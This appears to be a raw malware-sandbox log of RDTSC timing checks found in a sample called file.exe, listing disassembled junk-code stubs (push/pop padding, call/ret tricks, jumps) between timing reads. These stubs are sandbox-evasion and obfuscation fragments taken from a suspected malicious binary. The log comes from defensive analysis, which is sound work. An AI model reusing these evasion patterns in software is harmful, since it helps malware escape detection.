                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4AC1 second address: AF4AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4B4B second address: AF4B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F33B8517EA9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4B6E second address: AF4B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F33B8C742F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5C50 second address: AF5C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5C54 second address: AF5C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5C5A second address: AF5C86 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E9Ch 0x00000008 jl 00007F33B8517E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F33B8517EA9h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4CED second address: AF4D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d nop 0x0000000e sub dword ptr [ebp+122D3334h], esi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F33B8C742F8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov eax, dword ptr [ebp+122D12E9h] 0x00000042 mov dword ptr [ebp+124730E8h], esi 0x00000048 push FFFFFFFFh 0x0000004a mov bh, DBh 0x0000004c nop 0x0000004d jo 00007F33B8C74304h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4D4A second address: AF4D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6B72 second address: AF6BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F33B8C74309h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F33B8C74308h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F33B8C742F8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov bh, cl 0x0000002f push 00000000h 0x00000031 xor dword ptr [ebp+122D1CABh], edx 0x00000037 push eax 0x00000038 push ecx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8B7B second address: AF8B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8D4C second address: AF8D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8E0F second address: AF8E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFADAB second address: AFADB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F33B8C742F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8E13 second address: AF8E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8E19 second address: AF8E1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFADB5 second address: AFAE33 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F33B8517E9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jno 00007F33B8517E98h 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007F33B8517E9Eh 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov edi, dword ptr [ebp+122D27CEh] 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F33B8517E98h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d or edi, dword ptr [ebp+122D28BEh] 0x00000053 mov eax, dword ptr [ebp+122D167Dh] 0x00000059 push FFFFFFFFh 0x0000005b stc 0x0000005c nop 0x0000005d pushad 0x0000005e jnc 00007F33B8517E9Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFCC9B second address: AFCD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FDh 0x00000009 popad 0x0000000a jbe 00007F33B8C7430Fh 0x00000010 jmp 00007F33B8C74309h 0x00000015 popad 0x00000016 push eax 0x00000017 jno 00007F33B8C74305h 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F33B8C742F8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F33B8C742F8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 add dword ptr [ebp+122D347Eh], ebx 0x0000005a push 00000000h 0x0000005c movzx edi, cx 0x0000005f xchg eax, esi 0x00000060 jc 00007F33B8C74300h 0x00000066 push eax 0x00000067 push edx 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8E1F second address: AF8E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFE89 second address: AFFE8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFE8D second address: AFFE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFE93 second address: AFFE98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B01E24 second address: B01E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B01E2A second address: B01E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0244D second address: B024FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F33B8517E98h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 je 00007F33B8517EA6h 0x0000002e jmp 00007F33B8517EA0h 0x00000033 jmp 00007F33B8517E9Ah 0x00000038 call 00007F33B8517E9Ah 0x0000003d add dword ptr [ebp+122D1BADh], esi 0x00000043 pop ebx 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F33B8517E98h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 add bl, FFFFFFBFh 0x00000063 xchg eax, esi 0x00000064 jmp 00007F33B8517E9Ch 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F33B8517E9Eh 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B03433 second address: B03439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B03439 second address: B0348A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+124692B6h], edx 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 add eax, dword ptr [ebp+122D27C6h] 0x0000001c sub dword ptr [ebp+122D2B5Bh], ecx 0x00000022 popad 0x00000023 push 00000000h 0x00000025 jmp 00007F33B8517EA9h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F33B8517E9Fh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04646 second address: B0464A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0464A second address: B04656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B057B6 second address: B057BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDF4D second address: AFDF65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDF65 second address: AFE002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D228Bh] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F33B8C742F8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 sbb bh, FFFFFFA3h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F33B8C742F8h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000016h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov eax, dword ptr [ebp+122D0225h] 0x0000005d or dword ptr [ebp+122D1858h], edi 0x00000063 jmp 00007F33B8C74303h 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+122D31BAh], ebx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F33B8C742FCh 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEF52 second address: AFEF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F33B8517E96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEF5C second address: AFEF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFFB1 second address: AFFFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F33B8517E9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFFC0 second address: B00057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F33B8C74308h 0x0000000b jl 00007F33B8C74304h 0x00000011 pushad 0x00000012 jns 00007F33B8C742F6h 0x00000018 mov dword ptr [ebp+122D3362h], edi 0x0000001e popad 0x0000001f push dword ptr fs:[00000000h] 0x00000026 xor di, 4643h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov bx, 8EE9h 0x00000036 mov eax, dword ptr [ebp+122D0FB9h] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F33B8C742F8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 push FFFFFFFFh 0x00000058 mov ebx, 51C12B01h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F33B8C74309h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02728 second address: B0272C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0272C second address: B0274D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F33B8C74309h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0274D second address: B02751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B036D0 second address: B036F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F33B8C74308h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0D484 second address: B0D488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B127C2 second address: B127C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B127C8 second address: B127CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B127CC second address: B127D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B127D8 second address: B127DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B127DE second address: B127F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74302h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1489B second address: 931A1A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 24586E06h 0x00000012 jmp 00007F33B8517EA7h 0x00000017 push dword ptr [ebp+122D00C9h] 0x0000001d js 00007F33B8517E97h 0x00000023 call dword ptr [ebp+122D3209h] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov ecx, dword ptr [ebp+122D27EEh] 0x00000031 mov dword ptr [ebp+122D21EAh], eax 0x00000037 popad 0x00000038 xor eax, eax 0x0000003a pushad 0x0000003b mov dword ptr [ebp+122D21EAh], esi 0x00000041 or ch, FFFFFFF7h 0x00000044 popad 0x00000045 mov dword ptr [ebp+122D21EAh], edx 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f jmp 00007F33B8517EA7h 0x00000054 jmp 00007F33B8517EA0h 0x00000059 mov dword ptr [ebp+122D28CAh], eax 0x0000005f add dword ptr [ebp+122D30DDh], ecx 0x00000065 mov esi, 0000003Ch 0x0000006a jo 00007F33B8517E9Ch 0x00000070 mov dword ptr [ebp+122D21EAh], edi 0x00000076 add esi, dword ptr [esp+24h] 0x0000007a cld 0x0000007b lodsw 0x0000007d pushad 0x0000007e jbe 00007F33B8517E9Ch 0x00000084 jng 00007F33B8517E96h 0x0000008a ja 00007F33B8517E9Ch 0x00000090 popad 0x00000091 add eax, dword ptr [esp+24h] 0x00000095 cld 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a add dword ptr [ebp+122D3245h], eax 0x000000a0 push eax 0x000000a1 pushad 0x000000a2 jne 00007F33B8517E9Ch 0x000000a8 push eax 0x000000a9 push edx 0x000000aa jl 00007F33B8517E96h 0x000000b0 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA3F62 second address: AA3F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33B8C74307h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1915F second address: B19163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19163 second address: B19179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F33B8C742F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F33B8C742F6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19422 second address: B1943B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F33B8517E96h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jp 00007F33B8517E96h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B195C4 second address: B195C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19854 second address: B19862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517E9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B199D5 second address: B19A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74305h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F33B8C74303h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19C59 second address: B19C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B20AA3 second address: B20AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B20AA7 second address: B20AB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B20AB1 second address: B20ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F33B8C742F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25163 second address: B25169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25169 second address: B25172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25172 second address: B251D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F33B8517E9Fh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F33B8517EA4h 0x00000015 jmp 00007F33B8517EA1h 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d je 00007F33B8517EB4h 0x00000023 js 00007F33B8517E96h 0x00000029 jmp 00007F33B8517EA8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B251D8 second address: B251E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8C742FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B23FE6 second address: B23FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2D95 second address: AF2D9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2D9B second address: AF2DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2DA1 second address: AF2DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2E7D second address: AF2E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF325C second address: AF327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 715CA8E1h 0x0000000d mov dword ptr [ebp+122D2246h], edx 0x00000013 call 00007F33B8C742F9h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF342A second address: AF3430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF36FD second address: AF371D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF371D second address: AF3727 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF3727 second address: AF3782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8C74300h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ecx, dword ptr [ebp+122D321Fh] 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F33B8C742F8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dx, ax 0x00000033 mov edi, 3BABD55Dh 0x00000038 nop 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F33B8C742FBh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF3B9F second address: AF3BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF3BA5 second address: AF3BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8C742FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF3DDC second address: AF3DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
